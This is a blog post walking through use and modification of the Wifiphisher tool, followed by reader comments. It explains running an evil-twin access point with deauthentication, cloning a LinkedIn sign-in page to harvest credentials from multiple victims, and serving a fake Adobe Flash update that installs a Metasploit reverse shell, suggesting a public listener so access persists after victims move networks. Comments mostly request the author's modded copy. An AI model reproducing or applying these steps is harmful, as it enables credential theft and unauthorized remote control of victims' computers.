WiFi

WiFi Social Engineering – Playing with Wifiphisher

First, a little background:

Wifiphisher is a WiFi social engineering tool that automates phishing attacks against WiFi networks. Wifiphisher is written in Python and was developed by Greek security researcher George Chatzisofroniou.

Wifiphisher made waves in the wireless security world because of its unconventional attack method. Unlike traditional WiFi attacks, it doesn’t involve any of the handshake capture or password brute-forcing that anyone who’s tested wireless networks has become accustomed to. Wifiphisher’s attack success relies on social engineering victims into handing you the wireless network key and more, as we’ll see below.

Wifiphisher’s operation can be summarized into a 3 stage attack:

  1. Start a fake wireless access point (AP) – also known as an “evil twin
  2. Force victims to deauthenticate from the legitimate AP by sending deauthentication packets to them and to the access point they’re connected to.
  3. Get them to connect to your evil twin and serve them a web page that tricks them into giving you the wireless network password.

wifiphisher_Operation

It may seem like a lot of work, but one of the best things about Wifiphisher is its automation. All of the above can be done with a minimum amount of interaction from the operator. Wifiphisher’s deauthentication attack is inspired by Dan McInerney’s Wifijammer, which you should definitely check out.

To run Wifiphisher you will need:

  • A Linux system.
  • 2 wireless network adapters; one capable of injection (for the deauthentication attack). I’m partial to Alfa cards, so I’d recommend one of those; like the Alfa AWUS036H or the Alfa AWUS051NH.

Playing with Wifiphisher:

Wifiphisher was initially built to capture wireless network credentials. At the time of writing, it has 3 phishing scenarios; its most popular being the “firmware-upgrade” page below.

firmware_Upgrade

Wifiphisher uses this web page to trick targets into giving up the wireless network password by convincing them that it is required for a router firmware upgrade. Once the user enters the passphrase, it will get displayed on the operator’s terminal and Wifiphisher will shutdown the fake access point, hopefully leaving the target none the wiser about what just happened.

wifiphisher_Password

 

Adding phishing scenarios:

After using Wifiphisher for a few weeks, I figured that it would be fun to add a few more phishing scenarios to its arsenal. Unfortunately, Wifiphisher can’t contain any third-party material (such as logos or proprietary templates) due to copyright reasons; so no phishing pages for popular social media sites 🙁

But since I have no intention of distributing this modified version on Github, I figured it would be okay to go ahead and mess around with it anyway.

Creating a phishing page is usually pretty straightforward; download the original phishing page onto your system and modify the page’s login form to collect credentials.

The only catch with Wifiphisher is that when the attack is being executed, BOTH its operator (you) and the target will lose internet connectivity, meaning all phishing pages need to be standalone i.e. they can’t rely on any online resources. Luckily, wget makes downloading web pages and all their requirements really simple:

$ wget -E -H -k -K -p <insert URL here>

Running this should get you all the files you’ll need to setup your phishing page. I’ll be using the LinkedIn sign-in page for this post.

download_webpage

 

Wifiphisher captures credentials by logging all POST requests that are prefixed with the string “wfphshr”, meaning we’ll have to edit the username/email and password fields in our web page and append them with wfphshr.

wfphshr_Label

The prefix can be whatever you want it to be, so long as the prefix in Wifiphisher’s code and the web pages are uniform. The login form method also has to be POST, but this is almost always the case these days. Lastly, we add the new phishing option to Wifiphisher’s menu. That’s it, that’s all it takes to prep a phishing page for use. Now all I had to do is repeat the process for all the scenarios I wanted to add. After that I changed Wifiphisher’s phishing page menu to incorporate all the phishing options I added.

 

Testing it out:

 

1. Run Wifiphisher and select the strongest interface.

runWifiphisher

NOTE: I also modified Wifiphisher’s interface selection menu. If ran without any arguments, Wifiphisher will automatically select the most powerful Wireless interface as the jamming interface. It does this by scanning all WiFi networks in the area with all available wireless adapters, the interface that detects the most Wireless networks gets selected as the jamming interface. This is alright and works pretty well on most runs, but I’ve found that on some occasions, the wrong (weaker) interface will be selected. If the wrong card gets selected, the jamming stage of the attack might not even work because most laptop’s internal network adapters don’t support packet injection. You can still run Wifiphisher with arguments to manually specify the jamming interface, but I still wanted to change the default run option to use manual interface selection. The interface selection I used is inspired by Wifite.

 

2. Select a phishing scenario

phishingOptions

3. Select a WiFi network to target and wait for Wifiphisher to start the fake AP.

select_Network

4. Targets begin to connect to your evil twin

targets_Connecting

5. Target-side: Target is served the phishing page you selected, regardless of the site they browse to.

linkedIn_Login

linkedIn_Login2

6. Harvest credentials 🙂

linkedIn_credentials

NOTE: I also had to modify Wifiphisher’s request handler. It’s configured to automatically shutdown after 1 user inputs credentials. However, because I want to be able to collect more than just 1 user’s credentials, I removed the automatic shutdown.

 

Taking it further:

If we can display any web page to a target that successfully connects to our evil AP, why not serve them a page which advises them to download and install some “helpful” software? How about everybody’s favorite, Adobe Flash Player?

1. First we download the Adobe Flash Player installation page

download_Adobe

2. Next we change the download button to point to a file hosted on our system (adobe_update.exe). We’ll also reword the page’s text to convince our target to download the update file.

adobe_update

3. Prepare the payload. There are countless ways to do this, I can’t get into the various options available right now. So for this post, I’m just going to use Shellter to inject a Metasploit reverse shell payload into an executable, any Windows executable will do. You can change the executable’s icon to Adobe’s logo to make it more convincing.

shellter_Payload

 

4. Fire up Wifiphisher and select the payload download option. I added a payload selection prompt when the “Adobe Flash Update” scenario is selected. All we have to do here is give it the full path to the payload we just prepared.

download_Options

select_Payload

5. Wait for a target to connect to us.

targets_Connecting

6. Target-side: Target is served the Adobe update page as they try to browse and is convinced to download and install the update. We’ll even have our target scan it with their AV first, just in case the update isn’t legit.

target_Download

scan_Payload

 

7. Target runs the update file and we get shell 🙂

run_Payload

get_Shell

NOTE: I suggest using a payload that connects to a public Metasploit listener, so when you shutdown your evil twin, regardless of what network the user connects to next, you’ll successfully get a shell.

Conclusion:

I had a lot of fun messing around with Wifiphisher. I wasn’t able to contribute any of the scenarios in this post to the official version because of all the potential copyright violations mentioned earlier, but I did contribute a generic copyright-free payload download scenario. You can check out the “browser plugin update” scenario in the official Wifiphisher if you want to try out the payload attack above for yourself. Happy hunting.

Update:

I won’t be distributing this custom version of Wifiphisher any more since the official version of Wifiphisher now supports custom templates and a lot more features than this old mod. You can get Wifiphisher here.

188 Comments

  1. Hey Vivi, Can you please mail your version of wifiphisher. This article came just what i need at the moment. I am testing a new external wireless adaptor but unable to make it AP interface.

  2. good work VIVI !
    when i run wifiphisher i can’t see linkedin in my menu only default fonctions like “firmware upgrade, oauth-login ,plugin update etc..
    can you send me your version please thanks!

  3. Hey vivi…seeing your post…you are master.but im confuse to add more schenario.its said error 404 not found.can you please share your wifiphisher version?lot thanks

  4. Nice write up, i really enjoyed reading it. Now i’m curios to try out all of this features! May I have a copy of your version me too? I’m still not so good on phyton but i believe that comparing the original version with this one will be a really good study!
    Cheers

  5. Muy buen post, estoy estudiando estos métodos para aumentar mis conocimiento, me gustaria probar tu versión personal.

    *******************************

    Very good post, I am studying these methods to increase my knowledge, I would like to try your own version.

  6. Good job man

    I was trying to do that but i can´t, if you can send me your version for test it and learn how you do it, my python knowledges are a little poor and i wanna learn more.

    Thanks

  7. Do you have a video tutorial on this, if not can you make one. I real want to do a scenario of my own I found some screenshots missing (and I’m a noon in this field). Tell me if I can copy a webpage using “save as” on any browser or “wget” is compulsory!

    1. I don’t have a video tutorial. Please note that the current version of Wifiphisher has changed significantly from the version in this post, you can go through its documentation to better understand the process of adding scenarios
      ‘Save as’ will work for some web pages, but for others you’ll be forced to use wget to download its dependencies, it all depends on the target page’s design.

  8. Thank You so much for your work, I really need the option to specify which card to jam, the official program always chooses the wrong one, Can I please test yours?

    1. Wifiphisher allows you to manually pick which card to jam with using the ‘–jamminginterface’ or ‘-jI’ switch when you’re running it. Check out the usage examples on its Github page. I’ll also send you this modded version.

  9. Hi VIVI,

    It looks awesome!, I’m right now stucked with Wifiphisher trying to inject a reverse shell in an android device (and it’s not working). I’ls like to try your version, Can u provide it? tks my email: corugedo@yahoo.com

    TKS & regards

  10. Hi Guys,
    You made a absolutely beautiful modded version. And I want to test it, can you share me your modded version please.
    Pleasure to read you !
    S

  11. You did some really interesting things there! Personally I haven’t been that successful with the official WifiPhisher. But I would love to toy around with your version! A share would be greatly appreciated.

    Keep it up!

  12. Hi Vivi. I use google translator. I would like to test your build. is it possible to change the language in the script? With respect Alex

  13. Very interesting tool. Can I have a copy to play around please…
    Questions: Have 2 USB adapter RTL8187 and RT2870. Are these adapters able to handle wifiphisher ?
    Thanks

    1. If at least one supports injection they should work with Wifiphisher. You can test injection support by running aireplay against the interface(s) e.g.
      $ aireplay-ng -9 wlan0

  14. Quickly test it with few runs…unfortunately with no luck at this point.
    – Your version using one single interface only. Tried RTL8187, it does the injection okay but when target client actually connecting the fake AP, browser no responds at all however, it does able to obtain IP (10.0…), browser just stuck with nothing. Not sure if RTL8187 supports AP interface or not (iw info does shown it does support AP interface).
    – Using RT2870 again, it does support injection (shown with aireplay-ng –test xxxxmon) even not as good as RTL8187. It react similar as RTL8187 with no responds.
    – After play around with wifiphisher, Kali 2 Network Manager not running any more, must reboot… why ?

    Will testing more when have time…Thanks

  15. Just thought, for target router WPA/WPA2, the pop up should be simple as normal windows connection prompt withOUT any logo/details likely the best tactic approach. Simple pop windows asking for WPA/WPA2 pass key will do it becoz
    – if the target user knows about modem/router, SH/E will likely not responds if they see something out of ordinary such as the logo does NOT what their modem/router brand. It will not just fail once but rather fail to target the same AP again forever…
    – if the user not knowing much about it, firmware update/upgrade sounded too much for them to handle, so they would rather giveup and let other to take care of it. So you likely fail again.
    – best effective approach is simple for them to handle and deal with.
    cheers

  16. Hi, could I get a copy of your version please? Also my WGET is missing pictures and other important parts, how can I help this?

  17. How did you change wifiphisher to be not have it exit after stealing just a single user’s credentials? Thanks in advance.

  18. Good job on this Vivi, I would like to contribute to your work on this tool. Kindly share a link to the file. Thanks and keep up with the fantastic work

  19. Could you explain how to keep it running after 1 person enters credentials? I’m altering the phishing page to simply capture an email, no password, and I’d like to be able to see how many people enter legit emails. I will later confront them to discuss additional security training. Thank you.

  20. The latest version keeps running after collecting info, so it does what I need for now. You can delete my question/comment if you’d like.

    1. That’s great. I was going to mention that the Wifiphisher version used in this article is pretty old. I had to modify the class that manages the web server and remove the shutdown statement after a POST request is logged. I haven’t gotten around to looking through the updated version’s code yet but I can already tell that a lot has changed.

  21. Greetings from Montenegro! 🙂
    Can you please send me the download link for your version of wifiphisher?

  22. I love your work, you are excellent doing this tutorial and sharing your knowledge, can i try your Wifiphisher version? Thanks from Mexico

  23. Hi Vivi,
    Hope you are doing fine. Can you share your version for testing purposes/ personal use. I will appreciate it very much. Thanks again
    Kind Regards,
    George

  24. Hello Sir!
    greetings from PH. can I use your version, the latest version is very different from the one above.
    Thank you in advance.

  25. Hello VIVI, wow what a great tutorial. I’ve already tried flu*ion & wifiphisher. But your wifiphisher version looks much better. Way better. May i get copy of your version by email? I already play with wifiphisher and the official one seems not “legit” with all available scenarios. Thank you so much. And thank God i found this website 😀

  26. hey man ! that was pretty amazing ! I always wondered if I can add my own phishing pages to fluxion or wifiphisher , but I couldnt figure it out ! can you please send me your version that that maybe I can find the pattern in the script and play a little bit with it !
    Thank you so much ! greetings and appreaciation from Belgium

      1. hey man sorry I messed up my email its a “.” instead of an “-” (H*****.hatim@gmail.com) ! sorry about that and thank you so much <3

  27. good post and great work VIVI
    i always wanted to play with wifiphisher script add my own phishing pages and modifying the request handler to capture more than one user credentials , can you please send me your virsion !! lo learn more tricks about that

  28. hai vivi, i have question. how if i only have 1 wireless card? it still run right? i mean what is the effect if we only use 1 wifi card?

    1. Hi. The tool will still run, but you won’t be able to use the deauthentication attack. Run Wifiphisher with the –nojamming option.

  29. Hi VIVI. can i give the version you created a go please. it was interesting to read your step-by-step procedures. thank you in advance. also what are best security practices to prevent wifi phishing attacks ?

    1. Sure. A few general tips are switch your WiFi off when you’re not using it, avoid using public WiFi without additional security measures e.g. a VPN and just be aware of what’s going on with your browser/network connection. A little paranoia never hurt anyone.

  30. Hi,
    first of all, great work! I ended up on your website as I was reading some issues on the Wifiphisher github and Sophron told somebody to take a look here.

    Your version is pretty neat, can you send a copy for my email so I can test it?

    Greetings from Brazil

  31. Hello VIVI, your tutorial is very good, I learned a lot of things, can you send a copy of this version to me?thank you very much!

  32. Hi,
    really good job
    can we speak trough mail or here?
    Very hard for me to get it works this tool.
    Thanks in advance.

  33. You gotta be tired of people asking this by now haha,
    But could you send me a copy of your upgraded version ?
    I think you did amazing work here, I love the what you did with the Interface, along with all the other templates added, I am very curious to see how you implemented the new templates into wifiphisher along with the new interface, i tried to figure it out on my own at first, as i m sure others did too, it seemed fairly extensive and i commend you for it, haha
    (p.s. have you seen the “new” facebook-wifi, buisnesses use it, you have to sign in to facebook and check in at a place in order to use their wifi, i think it would fit really good into Wifiphisher, makes for a little more convincing phishing attack than a regular facebook login portal that wifiphisher came with, I mean what kind of wifi spot just asks someone to log into facebook for no good reason)

    1. Hehe. Just a little tired.

      I should clarify that this ISN’T an upgraded version. It’s just a mod of a very old version (> 1 year) of Wifiphisher.
      Wifiphisher has evolved a lot since then and the code base has changed significantly. The most recent version has a lot more features and improvements. I’ve sent you this old mod, but I’d advise you to use the most recent version of the tool. It now has an in-built template engine and a lot more phishing scenarios than it did when I wrote this blog-post.

  34. dear VIVI
    i tryed the steps to add the new pages to the directory ( wifiphisher–> data–> phishing pages)
    and i got the default page, so would you please tell how can i use your new pages??

    1. Hi, Mohamed. You should check out the “Creating a custom phishing scenario” in the Wifiphisher documentation.
      There are a few other steps such as creating a config.ini file that you need to do as well. The steps in this blogpost are for a much older version of Wifiphisher.

    1. Hi, Mina.
      I’m not actually on the development team, I just really liked the tool and decided to put up a blogpost about it.
      From what I can tell, Sophron and the rest of the team have plans to implement some of those recommendations.

  35. ok .. but i was talking about your version . to put these futures in them
    .. it will be great if you join the development team ☺️☺️

  36. Very interesting tool, just recently discovered your version/modifications. I would be very grateful if you could provide a link of your version to test. Please Keep up the great articles, it would also be great if your site had an option to donate some crypto-currency.

Leave a Reply

Your email address will not be published. Required fields are marked *